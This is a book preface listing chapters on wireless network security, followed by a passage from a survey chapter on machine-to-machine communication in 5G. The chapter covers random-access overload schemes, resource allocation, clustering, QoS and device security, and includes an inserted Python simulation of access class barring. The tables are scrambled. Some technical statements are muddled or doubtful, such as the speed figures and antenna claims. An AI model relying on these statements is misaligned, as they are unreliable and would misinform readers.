Preface


This book is written to provide the reader with an in-depth understanding 
of all the security issues for wireless networks. The wide scope of knowl- 
edge that this book contains will help the researcher to become acquainted 
with the various aspects of wireless communications. This book discusses 
the security issues in wireless networks for research development. It will 
enable readers to develop solutions for the security threats and attacks in 
wireless communication systems and networks. The book provides the 
most cost-effective solutions to deploy wireless across a large enterprise. 
It discusses financial and technical controls to mitigate the effects of any 
unforeseen risk involved in a large wireless project. 

In Chapter 1, “M2M in 5G Cellular Networks: Challenges, Proposed 
Solutions, and Future Directions,” 5th Generation wireless networks
(5G) are defined to meet the requirements of high data rates for thou- 
sands of users, synchronized connections for vast wireless sensor net- 
works, improved coverage area, efficient signal processing, low latency and 
enhanced network spectrum as compared to the 4th Generation wireless 
networks (4G). 

Chapter 2 discusses media access control (MAC), one of the sub-layers
of the data link layer (Layer 2) in the OSI (open systems interconnection)
model. The MAC layer provides a unique ID and controls the channel access
mechanism in order to interface with other nodes over a shared channel
by using a MAC protocol. A MAC address is very helpful for delivering a
data packet over an electronic network, which is not possible in the case
of a postal address.

Chapter 3 is “Enhanced Image Security through Hybrid Approach: 
Protect Your Copyright over Digital Images.” The security of the water- 
mark against unauthorized detection is a major point of concern. If some 
illicit user can detect the watermark from the watermarked image then he 
can very easily remove that watermark by making the image copyright-free 
or he may also remove the originally embedded watermark and insert his 
watermark. 



Chapter 4 discusses Quantum Computing. Quantum computers can 
bring about development in various fields like science and medicine that 
could save lives. Quantum computing can be instrumental in the advance- 
ment of machine learning so that illness can be diagnosed very quickly. 
With its help, materials can be discovered so that efficient structures and 
devices can be made. It helps to bring about development in financial strat- 
egies so that one could lead a better life in retirement. 

Chapter 5, “Feature Engineering for Flow-based IDS,” discusses Network
Security, Intrusion Detection System, Feature Engineering, Feature
Selection, NetFlow, Flow-Based Intrusion Detection System, and IP flow.

Chapter 6, “Environmental Aware Thermal (EAT) Routing Protocol for 
Wireless Sensor Networks,” discusses Wireless Sensor Network (WSN) as
one of the emerging technologies of the 21st century due to its growing 
demand in automation. WSNs are organized in large environmental areas 
and there are more chances for the sensor nodes to get affected because of 
external temperature. As the environmental temperature rises, the lifetime, 
quality of service and temperature of sensor nodes are easily influenced. 
Thus Environmental Aware Thermal (EAT) routing protocol is intro- 
duced to minimize the issue. In this protocol, the incoming data signals 
are assigned with normal, abnormal and critical priority levels. It consists 
of three potential fields such as environment, energy and quality of service. 

Chapter 7, “A Comprehensive Study of Intrusion Detection and
Prevention Systems,” presents the following: A computer network is sim- 
ply an interconnection of several computers that follow common commu- 
nication protocols. As network intrusion has been increasingly affecting 
organizational systems and crucial data, it is imperative that there exists an 
effective network security system in place. This is where the role of a sound 
intrusion detection system becomes important in an era where attempts 
at unauthorized access have become the norm rather than the exception. 

Chapter 8, “Hardware Devices Integration with IoT,” discusses the BLE, 
LPDDR, REST, HTTP, WiMAX, and GPIO. 

Chapter 9 is “Analysis on Denial of Service (DoS) Attacks and Their 
Countermeasures.” Denial of Service (DoS) attacks are some of the most expensive
and threatening cyberattacks that exist on the internet. Their main aim 
is to restrict the users/victims’ access to a specific resource. This chapter 
comprises all ideas, classification, and solutions to the DoS attack. DoS 
compromises the availability goal of the CIA triad. Topics discussed are 
DoS, CIA triad, TCP SYN, UDP, Zombies, VANET, IoT, and Post-Attack 
Forensics. 

Chapter 10, “A Practical Implementation of SQL Injection Attack,” dis- 
cusses SQL Injection, and SQL Injection Vulnerability. 

Chapter 11 is “Machine Learning Techniques for Face Authentication
System for Security Purposes.” The modern world is rapidly revolutioniz- 
ing the way things work. Everyday actions are being handled electronically. 
Based on this, a sub-division of application in recognition, specifically face 
recognition, emerged. Face recognition is a technology capable of verifying 
the identity of an individual using their face from a digital frame against 
a database. It has been one of the most captivating and prime research 
fields in the past few decades. The motivation came from the need for
automated recognition and verification. Compared with traditional biometric
systems, i.e., fingerprint recognition and iris recognition, face recognition
has numerous advantages, not just limited to “no-contact” and “user friendly”.

Chapter 12, “Estimation of Computation Time for Software-Defined 
Networking-based Data Traffic Offloading System in Heterogeneous 
Network,” notes that the approach of data traffic offloading methodolo- 
gies is likely to improve the quality of mobile service to address the issue 
of insufficient bandwidth due to the rapid growth of cellular data traffic. 
To measure the real-time performance of Software-defined networking 
(SDN) based offloading systems, computing the response time is essential 
to consider. 

Abstract

Fifth-generation wireless networks (5G) are defined to meet the requirements of 
high data rates for thousands of users, synchronized connections for vast wireless 
sensor networks, improved coverage area, efficient signal processing, low latency 
and enhanced network spectrum as compared to the fourth-generation wireless 
networks (4G). These networks were initially envisioned for efficient and fast 
mobile networks along with converged fiber-wireless networks. However, with 
the explosion of smart devices and emerging multimedia applications the need 
to roll out 5G networks to meet the demands both at the consumer and busi- 
ness end became necessary. Therefore, to create a network with faster speed, the 
5G networks have initiated a new basis for communication, which consists of 
the Internet of Things (IoT) and Machine-to-Machine communication (M2M). 
The IoT and M2M have been able to overcome the major limitations of 5G to 
initiate multiple-hop networks, making available high data rates to peers between 
several base stations and thereby reducing costs and initiating reliable security 
standards. Such a major deviation from the conventional design to involve large 
networks to support massive access by machine-type devices (MTDs) sets special 
technical challenges for M2M. This chapter offers an outline of the main issues 
raised by the M2M vision along with a survey of the common approaches pro- 
posed in the literature to enable the coexistence of M2M devices and the chal- 
lenges which need to be investigated. 


1.1 Introduction 


Every five years or so, enormous changes occur in cellular networks with 
the already existing generation networks in order to fix the faults of its 
predecessor networks. The 4G network was needed to make consuming 
data less of an unpleasant experience. However, it had its flaws, which were 
fixed by the emergence of 5G, which created a big change in the mobile 
networks. With the ever-growing count of wireless users, telecom tech- 
nologies continued to develop speedily, supporting the growth of service 
capacity and coverage to fulfill user demand for higher data. But the con- 
cerning issue with current network standards is a serious lack of bandwidth 
which limits support of higher data networks. Due to this issue, radio spec- 
trums on which the 4G networks operate are overcrowded and thereby are 
predicted to increase mobile traffic between 2010 and 2020 [1]. This being 
one of the major challenges, the telecom businesses are depending on 5G 
as an existence investor considering growing marketplace overthrow via 
internet groups. Attempts are being made by the telecom companies to
outline 5G technology that gives a record transmission speed of 10
gigabytes over the air [2], latency on the order of 1 ms [3] and IoT
units which run on a battery lasting for up to 10 years [4, 10].

In contrast to the 5G network, the contemporary vision of communica- 
tion systems in the new business areas like car—satellite communications, 
home automation, health security remote controlling, smart cities, Mobile 
POS, etc., require complete automated communication without human 
intervention. Such a novel form of communication is referred to as M2M 
communications. M2M visualizes a scenario where equipment on both 
sides have tens or hundreds of antennas or even more that renders better 
data rates for users with efficient energy and spectrum. It serves as the key 
element in the emerging of Internet of Things and Smart City models [5] 
and [6], which are planned to provide solutions to present and upcoming 
socioeconomic necessities for tracking and monitoring services, as well as 
for novel applications and advanced business setups [7]. 

The basic idea of M2M is to enable direct communication between users 
and the devices without the occupancy of the core network elements which 
requires offloading of the networks thereby exploiting the physical proxim- 
ities of the terminals. Even with the call for such solutions, the potential of 
M2M can be set free only if the connectivity of the Machine-type Devices 
(MTDs) is probable everywhere without employing additional devices and 
without (or with minimal) configuration. In this point of fact, the ideal sit- 
uation should be such where the MTDs are ready to be connected with the 
rest of the world by placing it in the favorable position. Figure 1.1 describes
the ways of connectivity in the M2M communication with three cases. 

With specific instances of M2M connectivity, new applications with
international offerings are connecting many kinds of embedded Wi-Fi
machines/devices to create a rapidly developing IoT, which promises to
expand growth and revenue opportunities for present-day carriers in the
face of waning margins in established lines of business. Including the IoT
applications, M2M links networks in many ways, providing an optimal form
of connectivity with Machine-Type Communications (MTCs) and enabling:
remote industrial control systems (ICS); security metering monitoring of
transportation; third-party video streaming and gaming content; voice
signaling; e-healthcare emergency monitoring and metering; domestic and
industrial automation; and a lot more. Figure 1.2 shows a range of
applications of M2M communication in a variety of areas, forming a large
ad hoc network that permits nearby units to connect.

Figure 1.1 Cases for M2M connectivity. (a) Basic M2M connectivity, (b) M2M in which
a single application shares information with a group of similar devices, and (c) M2M
communication using the gateway device [8].

Figure 1.2 Applications of M2M communications [9].

Unfortunately, due to the massive accesses and high user demands, the
technologies that are supposed to carry out MTC are not quite capable of
meeting the demands for ubiquitous coverage of M2M communications. The
ubiquitous access offered by satellite connections has prohibitive costs,
posing major challenges when used in indoor environments. This therefore
calls for radio technologies which are capable of providing an extensive
coverage area with low power consumption and reduced cost. At the same
time, operating such a new infrastructure network at a diverse scale is
an economically challenging task, thus making it necessary to add the MTC
devices to the services of the existing communication networks.

Consumer attitude to usage of internet is altering due to the alteration in 
the tendencies. Such user demands can only be fulfilled by the widespread 
mobile network supporting the M2M communication offering higher effi- 
ciency, security and robustness. Current standards being designed to pro- 
vide access to only a small count of devices are likely unable to cope with 
the expected growth in the traffic of the M2M communication networks, 
thereby becoming a major challenge for the 5G networks [8]. Due to this 
reason the major focus is to enforce the M2M services as shown in Figure 
1.2, which involve myriad devices generating efficient periodic transmis- 
sions of short data, predicted to play a major role in the future networks. 

This chapter surveys the major challenges presented to the wireless cel- 
lular network standards by the massive M2M services. Section 1.2 is the 
literature survey giving the current standards for enabling the M2M ser- 
vices. Section 1.3 addresses in greater detail the challenge of the same with 
their proposed solutions to fill the gaps in the future to fully support M2M. 
Section 1.4 concludes this chapter with the final reconsiderations. 

1.2 Literature Survey


Researchers have predicted that more than a billion devices will connect
with the M2M communications through mobile networks by 2020. Statistics
show that world cellular traffic will experience an increase of around 70%,
with 26% smartphones accountable for 88% of total cellular data traffic [9].
The current 4G mobile systems fail to support this huge scale of data
usage, since they were initially planned to hold up to 600 RRC-connected
users per cell [10, 11]. In comparison, M2M communications and IoT involve
thousands of connected devices in a single cell. This makes it essential
to support standards that enable M2M communications.

The authors in [12] differentiated the M2M communications from 
mobile Human-based (H2H) because the H2H traffic (browsing, file trans- 
ferring, video streaming) cannot be directly applied to the M2M [12, 13], 
mentioning the M2M traffic direction as uplink whereas the H2H traffic 
direction as downlink. The M2M applications duty-cycled with short con- 
nection would promise fast access to the M2M network, resolving major 
traffic problems in the M2M communications due to H2H traffic. 

Due to increased H2H and M2M traffic, Wi-Fi communications cannot
refrain from dealing with the new challenges of radio spectrum congestion.
In [14], the authors provided a complete investigation of M2M fading
channels in coordinated and cooperative networks under line-of-sight (LOS)
and non-line-of-sight (NLOS) propagation conditions. The survey evaluated
the performance of dual-hop relay systems with equal gain combining, which
improved the overall system performance of LOS components in the
transmitting links [14]. Apart from the radio spectrum congestion, current
research studies defined the problems faced by M2M devices, such as channel
instabilities [13-15] and noise, along with coordination uncertainties in
media access. Researchers explained that this unreliable processing and
transmission in the communication medium leads to data loss, causing a
major M2M failure, thereby stating reliability as an unresolved challenge
for the M2M standards [16].

Also, with the rapid rise in the number of wireless users there is a
notable increase in concurrent accesses, causing extra packet collisions
due to interference and resulting in data loss. Thus, maximizing the uplink
channel and optimizing the radio resource allocation improved the overall
performance with efficient Quality of Service (QoS). Along with dependable
QoS, M2M units are designed in such a way that they are normally less
expensive and small in dimension, with energy, bandwidth and storage
constraints on communication. The networks on which these M2M units work
provide extensive coverage areas with high data rates and reduced latency.
However, in spite of these advantages, there are many more challenges to
the M2M networks, which have been specified in [15, 17]. The study in [18]
testified that the M2M traffic in the presence of 4G traffic is not to be
considered negligible, hence degrading the performance of the 4G networks
in terms of QoS. Thus, the operation of M2M has to be seamless, i.e.,
without human intervention, stopping occasional physical attacks
[15, 16, 19, 20]. The attainable success of M2M applications in overcoming
all these challenges promises to extend the diversity and range of the
units to be connected and the traffic in the upcoming years. So, the
present research is focusing on enhancing the overall performance of the
system in terms of energy consumption, efficiency or delay.

Moreover, further improvements supporting the M2M communica- 
tions have been stated by the authors in [21] analyzing sensor-to-gateway 
communications in terms of delay and energy efficiency in wireless M2M 
introducing the contention-based MAC protocols. The study defined the 
use of gateways in the wireless M2M network driving a large number of 
devices that regularly wake their radio interfaces to the gateway carrying 
out high data rates with low latency. This use of gateways is supposed to 
reduce the number of devices to be accessed, thereby making the trans- 
mission less complex and reducing interference with increased efficiency. 

Other authors in [22] have explained the idea of Clone-to-Clone (C2C) 
to solve the issues obstructing the development of the next generation 
applications by reducing the traffic, recovering overall network perfor- 
mances and mitigating the power consumption of the devices. The concept 
of Energy Efficient and Reliable (EER) and Green Allocation with Zone 
Algorithm (GAZA) to achieve overall power and energy efficiency, for reli- 
able M2M communication has also been stated in [23]. 

With the sudden advancements in user-supported communication
including e-health, security and surveillance, industrial and energy, one
of the crucial areas in need of M2M device communication is intelligent
transportation systems (ITS). The key component of ITS, Vehicular Ad Hoc
Networks (VANETs), are created and connected by mobile ad hoc networks
(MANETs) for the spontaneous creation of wireless networks for data
sharing. Emphasis on the same has been made to define M2M vehicular
networking, with the standardization of communication interfaces as a major
challenge given the high mobility and variability of components [24].
Furthermore, data aggregation strategies that can deliver channel access
enhancements in M2M communications for mobile networks, mentioning the use
of delay to improve uplink transmission efficiency, have been described in
[25]. In addition to this, the global delay would reduce with the increase
in the number of M2M devices. Another scheme cited to decrease delay or to
achieve greater power and energy efficiency is the transmission scheduling
method [26]. An overview of using already existing scheduled airliners as
relays between ground devices and satellites, offering a new M2M
infrastructure, has been discussed in [27].

M2M communications cannot be reliable if the mobility, delay patterns 
and most specifically energy efficiency is not met [16]. This is usually at 
the time of using radio technologies for communications due to lower 
available bandwidth, higher link failure, and higher energy consumption. 
Finally, future work will likely combine a range of strategies
(transmission scheduling schemes, data aggregation, gateways) to minimize
the quantity of necessary data to be transmitted. Managing security and
privacy in such a vivid network (M2M) obviously requires good attention,
making M2M communications more efficient.

Summarizing the current M2M standards that have supported to enable 
the M2M communications, the next section describes the challenges which 
need to be overcome along with their proposed solutions. 


1.3 Survey Challenges and Proposed Solutions of M2M


With the explosion of M2M and IoT applications, large tech companies are 
jumping on board with devices ranging from wearable to beacon modules. 
There are many considerations which need to be taken into account for the 
deployment of M2M and IoT technologies. So it becomes mandatory to 
study the challenges and the interference from each aspect, from cost and 
power to long-term product life cycle of the M2M devices. The challenges 
to enable the M2M communications include small-sized data transmis- 
sions supported by larger value of devices after regular and irregular inter- 
vals; high reliability, low latency and low energy consuming mobile profiles 
assuring that regular H2H traffic is not disturbed by the M2M traffic. 

1.3.1 PRACH Overload Problem


The Random Access Channel (RACH) process is one of the key challenges 
[28] for M2M. This is because of the traffic load caused by a rapid rush of 
myriad M2M devices trying to access the base station at the same time. 
According to the latest M2M traffic surveys, approximately 3.2 billion cel- 
lular-based M2M devices are expected to join the network in 2024 [29] 
making Quality of Service (QoS) provisioning an important challenge [30] 
for the M2M communications. 

The rush to access Physical Random Access Channel (PRACH)
resources is likely to degrade the M2M services. The enormous access calls
by M2M devices burden the PRACH, resulting in access delay and failure 
rate. This traffic load can be reduced by multiplying the number of access 
devices scheduled per frame, but this further introduces a new challenge 
of reduced capacity for the devices. Thereafter, it becomes important to 
deduce schemes to overcome this overload problem. The author in [10] has 
forwarded various methods which include the isolation of the M2M and 
Human-2-Human (H2H) services by simply splitting the two or by making 
the two services share the same resource, giving them a combined name of 
Hybrid schemes. Apart from this, there are various other approaches that 
have been put forward to offset PRACH overload [31]. 


• Pull-based scheme: This is a central scheme which permits
the MTDs to access the PRACH paged by the eNodeB (eNB)
[31] keeping an account of the network load conditions to 
prevent overloading problems. With this approach the net- 
work channels can be managed having regular traffic pat- 
terns using a single server. However, being managed by a 
single M2M server the scheme cannot deal with unexpected 
flow of MTD access requests. 

• Resource separation: The Resource separation scheme provides
the simplest and most instant way to protect H2H
devices from the risk of collisions due to diverse MTC 
requests by assigning orthogonal PRACH resources to H2H 
and M2M devices. The separation of resources can be done 
either by splitting the H2H and MTC devices into groups, or 
by simply allocating them different RA time/frequency slots 
[31]. To get a better effect, coupling with mechanisms which 
dynamically shift the resources among the two classes in 
accordance to the required access request rates is mandatory. 

• Back-off tuning: Another scheme to clear the congestion
caused by the traffic of requests in a smooth way is by assign- 
ing the back-off intervals to the MTDs which fail the trans- 
mission in RACH procedures [31]. Though the collisions 
between H2H and M2M devices can be improved efficiently, 
due to instability issues initialized by the ALOHA-like mech- 
anisms this scheme is really not effective when dealing with 
stationary MTDs massive access. 

• Access Class Barring (ACB): The above stated back-off
tuning mechanism is a generalization of the Access Class
Barring (ACB) method. The ACB scheme has each class
allotted with an access probability with a barrier time [31] 
making it possible to define several access classes with 
dissimilar access probabilities. The access of the device is 
debarred, making the device wait for a random back-off time 
when the Message transmitted in the RA slot is larger than 
the access probability factor. Another scheme of Extended 
Access Barring (EAB) was projected that can withstand lon- 
ger access delays [31], hence barring the device without the 
need of any new access class. This technique makes it pos- 
sible for the MTDs to mitigate the massive access issue by 
simply labeling them as an EAB device. Thus ACB can prove 
to be quite useful in avoiding the overload problem but only 
with respect to longer access delays for the MTDs, whereas 
it fails in the case of contention-based access events like fire 
alarms due to power failures or any other unexpected event 
which require short time intervals. 

• Self-Optimizing Overload Control (SOOC): In [28] the
authors presented a complex scheme, i.e., SOOC, to offset 
PRACH overload by simply merging the pull-based, back- 
off, ACB, including the resource separation scheme. The 
primary feature of this scheme is the implementation of the 
control loop to collect information for overload examining 
at every RA cycle. Basically, the device enters the overload 
control mode and the classical p-persistent mechanism is 
applied for the regulation of RA cycles when it is not able 
to receive an access grant at the first attempt. Also, to dif- 
ferentiate between time-tolerant MTDs and time-sensitive 
MTDs, two access classes, namely low access priority and 
high access priority have been added in this scheme for the 
M2M devices. Though handling high traffic loads can be 
attained using this scheme the author in [28] has not provided
enough evidence relating to the performance of this
scheme. 

• Bulk MTC signaling scheme: Another scheme in [32] provided
a further solution to overload problems by enabling
bulk MTC signal handling stating lack of mechanisms while 
handling overheads generated from collective MTDs. This 
overhead can be reduced at the Base Station by making use of 
bulk processing (collecting signal data coming from MTDs 
before accelerating them to the core network). As an illus- 
tration for this scheme, consider a group of MTDs which 
are triggered to send Tracking Area Update (TAU) where 
the Base Station has to wait for a default timeout interval 
or awaiting the time it has gathered enough information to 
forward a message towards the Mobility Management Entity 
(MME). Since the MTDs are linked to the same MME, 
the TAU messages are going to be different on the MME 
Temporary Mobile Subscriber Identity (M-TMSI). A situa- 
tion where an average of 20 TAU msg/sec with a period of 
10 s, 200 TAU messages can be combined in a single 1211 
bytes/msg in contrast to which an individual message would 
acquire up to 4500 bytes of space. Hence the approach in this 
scheme can reduce the intensity of traffic produced by large 
channel access. 
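
The ACB and back-off trade-off described in the list above, as an added simulation that is not part of the original chapter. It models a synchronized M2M burst contending with background H2H devices; the preamble count, back-off window, barring time and the barring check itself (a device draws a random number and is barred when it is not below the broadcast factor) are assumptions chosen for illustration.

```python
import random
from collections import defaultdict

PREAMBLES = 54        # contention preambles per RA slot (assumed value)
BACKOFF_WINDOW = 20   # max back-off after a collision, in RA slots (assumed)


def simulate(n_m2m, acb_factor, barring_slots=8, n_h2h=100, h2h_span=50,
             max_slots=5000, seed=7):
    """Slotted PRACH contention: an M2M burst at slot 0 plus background H2H.

    acb_factor is the access probability broadcast for the M2M class;
    1.0 disables barring. H2H devices are never barred in this model.
    """
    rng = random.Random(seed)
    schedule = defaultdict(list)             # slot -> [(device, is_m2m), ...]
    arrival = {}
    for dev in range(n_m2m):                 # synchronized burst, e.g. after an outage
        schedule[0].append((dev, True))
        arrival[dev] = 0
    for dev in range(n_m2m, n_m2m + n_h2h):  # H2H arrivals spread over h2h_span slots
        arrival[dev] = rng.randrange(h2h_span)
        schedule[arrival[dev]].append((dev, False))

    tried = set()                            # devices that have transmitted at least once
    collisions = h2h_first_ok = m2m_delay = 0
    pending = n_m2m + n_h2h
    slot = 0
    while pending and slot < max_slots:
        by_preamble = defaultdict(list)
        for dev, is_m2m in schedule.pop(slot, []):
            # ACB check: draw q in [0, 1); barred for a random time if q >= factor.
            if is_m2m and rng.random() >= acb_factor:
                schedule[slot + rng.randint(1, barring_slots)].append((dev, True))
                continue
            by_preamble[rng.randrange(PREAMBLES)].append((dev, is_m2m))
        for contenders in by_preamble.values():
            alone = len(contenders) == 1     # a preamble picked twice collides
            for dev, is_m2m in contenders:
                first_h2h_try = not is_m2m and dev not in tried
                tried.add(dev)
                if alone:
                    pending -= 1
                    if is_m2m:
                        m2m_delay += slot - arrival[dev]
                    elif first_h2h_try:
                        h2h_first_ok += 1
                else:                        # back-off: retry after a random wait
                    collisions += 1
                    retry = slot + rng.randint(1, BACKOFF_WINDOW)
                    schedule[retry].append((dev, is_m2m))
        slot += 1
    return {
        "served_all": pending == 0,
        "slots_used": slot,
        "collisions": collisions,
        "m2m_mean_delay": m2m_delay / n_m2m,
        "h2h_first_try_rate": h2h_first_ok / n_h2h,
    }


def compare(n_m2m=1000):
    """Same burst with barring disabled and with a 5% M2M access probability."""
    return {"no_acb": simulate(n_m2m, acb_factor=1.0),
            "acb": simulate(n_m2m, acb_factor=0.05)}


if __name__ == "__main__":
    for name, result in compare().items():
        print(name, result)
```

With barring enabled the burst produces far fewer preamble collisions and H2H devices succeed on their first attempt more often, at the price of a longer mean M2M access delay, which is why the text notes that ACB is a poor fit for time-critical alarm traffic.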


1.3.2 Inefficient Radio Resource Utilization and Allocation 


The existing cellular standards are not capable of handling a large number
of devices with small-sized payloads, leading to network congestion.
This makes it important for the existing mobile networks to be amended to
support diverse M2M devices, ensuring efficient allocation and utilization
of the radio resources. Hence, novel methods are introduced to manage the
overload issues, such as back-off adjustment, M2M prioritization, etc. The
radio access network and existing networks need to be improved to support
various M2M devices in the future [19]. The reality is that cellular radio
resources are scarce, and an efficient use of such radio resources for M2M
needs has to be guaranteed. This efficient utilization of limited radio
resources has to be achieved or the overall performance of M2M will
probably degrade. Therefore, this theme needs vital attention to avoid
congestion problems in M2M services effectively. Figure 1.3 shows an
example of resource allocation in present-day cellular standards, which are
neither designed to handle small data payloads efficiently nor able to
handle myriad devices concurrently [23].

Figure 1.3 Radio resource allocation in existing mobile standards [23].

The main issue in the case of dissimilar traffic is the management of 
interference, which needs a complex resource partitioning mechanism. 
A coordinated radio resource allocation is being enabled by partitioning 
among different devices which reduces the congestion problems to some 
extent. A number of scheduling algorithms were proposed by authors to 
estimate the performance in terms of throughput and equality between the 
mobile users [27]. Figure 1.4 represents the resource scheduling mecha- 
nism which supports M2M communication. 

The aforementioned proposed approaches, consisting of self-organizing
mechanisms with minimal phone transmitting power to make use of frequency
reuse patterns, offer a solution for interference as well as optimal
frequency reuse [28]. To support M2M traffic [29], different scheduling
schemes have also been suggested which consider the network environments
as well as delay limitations, maximizing the count of sustained units per
cell. Hence, the performance of the aforementioned mechanisms is fairly
favorable at the cost of excessive signaling overhead [30], which will be
one of the most tedious issues in the future too.


1.3.3 M2M Random Access Challenges 


Non-wired access may depend on short-range wireless networks (ZigBee,
Wi-Fi, etc.) or wide-range cellular networks (GSM, GPRS, UMTS, and LTE).
Even though wired access methods are more reliable, introducing less delay
and providing greater throughput, these methods are not appropriate for all
M2M applications because of factors such as mobility, lack of scalability
and cost efficiency. These are the cases where non-wired networks play a
necessary part. Non-wired access over short-range links is inexpensive,
accessible, and consumes much less energy. However, these links are
inappropriate for M2M communications because of low data rates, high
interference, weaker security, and much lower mobility.


• Quality of Service: Interference is likely to occur as M2M and H2H
  traffic contend for PRACH resources. However, the performance of H2H
  traffic should not be affected; therefore M2M/MTC traffic has to meet
  QoS. Also, the most promising choice of transmission mode needs an
  appropriate QoS, which must have small delays, mainly in emergencies,
  and higher data rates, e.g., for surveillance applications.

• Cognitive M2M communications: The primary challenge is the constantly
  growing signaling overhead caused by the huge number of M2M units
  connected per cell, which causes bandwidth issues. This bandwidth problem
  could, on the other hand, be resolved by common strategies, i.e., by
  increasing the number of eNBs. Another related challenge is the
  interference between MTC and non-MTC units, which could be handled with
  the aid of centralized coordination; however, this increases the overall
  complexity. Thus, the best approach would be to implement distributed
  resource management, which may also help reduce the interference between
  certain devices [33]. Furthermore, a better idea for letting a large
  number of devices connect per cell has been presented, i.e., random
  access mechanisms that make the MTC and non-MTC devices share the same
  limited radio spectrum.

• Collective (Group-based) M2M communication: The main challenge for this
  mechanism is to allocate slots where group-based communication plays a
  vital role [34]. The major goal of this mechanism is to reduce signaling
  congestion on the air interface. Additionally, in order to limit the risk
  of network congestion, the energy consumption of devices can also be
  reduced. Machines need to send/receive data to/from a neighboring point,
  where the grouping of MTC devices needs special attention. Such
  communication requires grouping by logical/physical attributes based
  primarily on QoS and other MTC traffic characteristics [35].


1.3.4 Clustering Techniques 


Various clustering techniques that take priorities and delay restrictions
into account have been introduced to handle massive access, supporting the
maximum number of devices connected in the M2M network. Figure 1.5 is an
example of the clustering technique in M2M networks.

• Clustering mechanism in M2M devices: In a clustering mechanism, all
  devices in a network are associated with one or more groups on the basis
  of their geographical location and with regard to their QoS requirements
  [34]. The clustering scheme is beneficial in minimizing the energy
  consumption of MTDs [36], which reduces the risk of network collisions.
  Another scheme that has been proposed is dynamic radio resource
  allocation, in which an eNB allocates PRACH resources among the MTDs on
  the basis of the PRACH traffic load in that particular network [37],
  hence enabling this clustering mechanism.

• Energy-efficient clustering of MTDs: Another way to control network
  congestion is to appoint nodes, known as cluster-heads, toward the Base
  Station, which can limit the number of requests at the Base Station. The
  risk of congestion due to massive access could also be reduced by
  selecting coordinators, which again helps reduce power and energy
  consumption. More schemes for massive access management and power
  efficiency are combined by the author in [36], who puts forward the idea
  of N MTDs deployed in a single cell centered at the Base Station,
  maximizing the energy efficiency of the MTDs.

• QoS-based clustering technique: Clustering is used as an effective
  remedy for the massive assignment of a large number of MTDs, each with
  small transmissions and distinct QoS requirements, to a radio resource
  [34, 38]. Here the devices are grouped depending on their arrival rates,
  which helps form clusters of devices with similar QoS requirements and
  provides efficient power and energy consumption.


1.3.5 QoS Provisioning for M2M Communications 


QoS provisioning is the most important requirement of a telecommunication
system. It is a set of service-related tasks undertaken by the service
provider to deliver a desirable service to the consumer [39]. It is a
challenging situation for operators/service providers because M2M
applications cover a huge range of tasks that differ in data/packet size,
task priority, delay, and mobility demands. Also, some kinds of M2M traffic,
such as emergency alerting and accidental and/or critical e-healthcare
information, are delay-sensitive and demand strict priority, which makes it
essential that M2M traffic does not create much delay. In contrast to
emergency alerting, the traffic generated by point-of-sale terminals claims
low priority; likewise, it should be noted that smart metering, tracking and
monitoring appliances create constant traffic patterns, considered
low-priority traffic but with higher data rate requirements. Table 1.1
provides information on the QoS class types for M2M communications.


Table 1.1 QoS class types for M2M communications [40-42]. 


Purpose Health Security | IP Multimedia | Video Home Security 
Remote Subsystem Streaming, Automation | Metering 
Control & & Wireless Video Tracking 
Maintenance Point on Signaling 
Sale (POS) 


Features High Reliability | High Security | Access Increased Low Error 
& Access & Privacy Priority Security Rate 
Priority & Low 
Latency 
Traffic Random Random Random Random Regular 
Type Real Time Real Time 


1.3.6 Less Cost and Low Power Device Requirements 


The technical issues are summarized in [43]; an open question that
operators need to tackle is how to charge the user for M2M services. A
basic M2M device demands low rate and low energy usage. Moreover, devices
that act as transmitters for other users consume their own resources, such
as battery, data storage and bandwidth, which calls for suitable pricing
models to encourage users to take part in such communication. M2M equipment
is expected to be in use for a longer time period, which indirectly becomes
a difficult task for component manufacturers as well as for service
providers. Additionally, because of longer inter-arrival times, users spend
most of their time in the idle state. This idle state is essentially a
low-energy state in which devices save battery by staying in sleep mode, or
wake up at particular instants to check for system information (SI) updates
[44]. Therefore, the key idea is to improve battery life by moderating the
activity in idle mode, which can easily be sustained through the use of
paging cycles, which should not be regular. This is because the devices
have to be in active mode only if there is data to transmit. Table 1.2
shows the optimization of low cost and low power for environment-friendly
M2M communications. These mechanisms result in low-power devices, which
themselves help to reduce the cost of the services.


Table 1.2 Optimization of low-cost and low-power M2M devices [43, 45, 46]. 


[Table 1.2: surviving labels: Release 13; Complexity; Transmitting]


1.3.7 Security and Privacy


M2M security mainly concerns user attributes and their communications,
which cover authority, integrity, authenticity and secrecy. Privacy in M2M
is therefore vital for user acceptance [47]. Diverse sectors such as
e-health, smart metering, industrial and energy, transportation logistics,
etc., may also have specific privacy requirements, which have to be
considered at the initial stages of design.

Because diverse heterogeneous networks are fused together, M2M
communications must address all the threats that arise when communicating
under different network-based communication standards. Even so, it should
never be assumed that M2M has not introduced new threats. Existing threats
are prone to be amplified within the M2M environment, and these threats can
cause financial losses and, indirectly, endanger human lives. M2M devices
are mainly deployed in amicable locations and probably work for prolonged
periods. Therefore, the devices are exposed to numerous physical attacks.
The major categories of attacks on M2M are shown pictorially in Figure 1.6,
and their probable solutions are shown in Figure 1.7.

The most required feature of any communication system is that personal
information must not be disclosed at any cost. Otherwise, it can cause a
huge loss of either personal or corporate assets. In M2M, meeting the
obligation of secrecy is important because of the existence of smart
things, which indirectly create a threat of technology being mishandled.
The massive number of smart things makes preserving the privacy of private
data a gigantic challenge. One approach is to establish a reliable
third-party security association, which will be responsible for endorsement
distribution. However, if there are a huge number of M2M devices with
different applications, this scheme appears too costly to apply. Because of
this constraint, a lightweight cryptography technique is preferred in M2M
communications. Asymmetric-key and symmetric-key authentication can also be
applicable in a variety of deployment situations of M2M communications.

Figure 1.6 Diverse types of attacks likely to occur during M2M
communication.

Figure 1.7 Probable solutions for M2M security issues.


1.4 Conclusion 


Current cellular systems were not designed to support M2M networks;
however, they are capable of meeting present-day demands and user
approaches for M2M services. Furthermore, if the M2M market is able to
fulfill the demands of users and networks, these technologies will hit the
present networks with the biggest change. The future evolution of M2M
applications is likely to rely upon a mix of proprietary technologies
clearly intended for MTD connectivity. Considering that M2M devices and
applications remain deployed for a long time with minimum intervention and
maintenance, M2M architectures are likely to last for many years to come
and will finally be absorbed by 5G, which is concentrating more on
dominating the non-cellular technologies that are purely advocated for
future M2M services. Mobile M2M communications are being targeted because
of their usefulness in a number of applications such as healthcare,
transport systems or telemetry, and also because of the emergence of IoT. A
major challenge faced by cellular M2M networks is to support an unlimited
number of devices with small payloads, which causes inefficient use of PRBs
(Physical Resource Blocks) and therefore results in excessive signaling
overhead and an increased risk of network congestion. Future work will
